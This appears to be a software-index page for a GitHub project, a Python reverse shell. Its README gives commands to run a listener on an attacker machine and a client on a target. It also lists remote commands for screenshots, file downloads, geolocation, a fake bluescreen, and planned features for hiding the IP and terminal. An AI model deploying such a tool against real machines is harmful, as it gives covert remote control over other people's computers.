Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/jcs090218/reverse_shell
Reverse shell implementation using Python
https://github.com/jcs090218/reverse_shell
exploit microservice reverse-shell vulnerability
Last synced: 27 days ago
JSON representation
Reverse shell implementation using Python
- Host: GitHub
- URL: https://github.com/jcs090218/reverse_shell
- Owner: jcs090218
- License: mit
- Created: 2019-01-21T17:04:08.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2021-01-05T18:26:20.000Z (about 4 years ago)
- Last Synced: 2024-11-09T15:48:41.706Z (3 months ago)
- Topics: exploit, microservice, reverse-shell, vulnerability
- Language: Python
- Homepage:
- Size: 1.02 MB
- Stars: 5
- Watchers: 2
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE.txt
Awesome Lists containing this project
README
[![Python Ver.](https://img.shields.io/badge/python-%3E=_3.6-green.svg)](https://www.python.org/downloads/)
[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)# Reverse Shell
Reverse shell implementation using Python.
## Installation
**NOTE**: Python 3.6 or higher is required.
```bash
# clone the repo
$ git clone https://github.com/jcs090218/reverse_shell# change the working directory to reverse shell
$ cd reverse_shell# install python3 and python3-pip if not exist
# install the requirements
$ pip3 install -r requirements.txt
```## Usage
### 1. Listen for target
On attacker machine, run the `attacker.py` script.
```
python3 attacker.py [port]
```### 2. Execute reverse shell
On target machine, run the `target.py` script.
```
python3 target.py [host] [port]
```## Commands
```sh
# Halt
!dc Disconnect the target from this host, target will start reconnection process.
!shutdown Shutdown both `attacher` and `target`.# Listen
!screenshot Screenshot the target machine.# Cheat
!bluescreen Fake bluescreen. (Windows Only)
!dl Download file by URL onto the target machine.# Information
!wan_ip Get the WAN IP.
!lan_ip Get the LAN IP.
!geo_info Get the geolocation on the target device.
```## Features
### Implemented
* Auto reconnection
* Downloader (Download file to target machine)
* Screenshot
* Full control on the target machine.### Not Implemented
* Packet encoder/decoder.
## TODOs
* Bluescreen (Fake)
* Hidden IP
* Hidden terminal
* Multi-target listening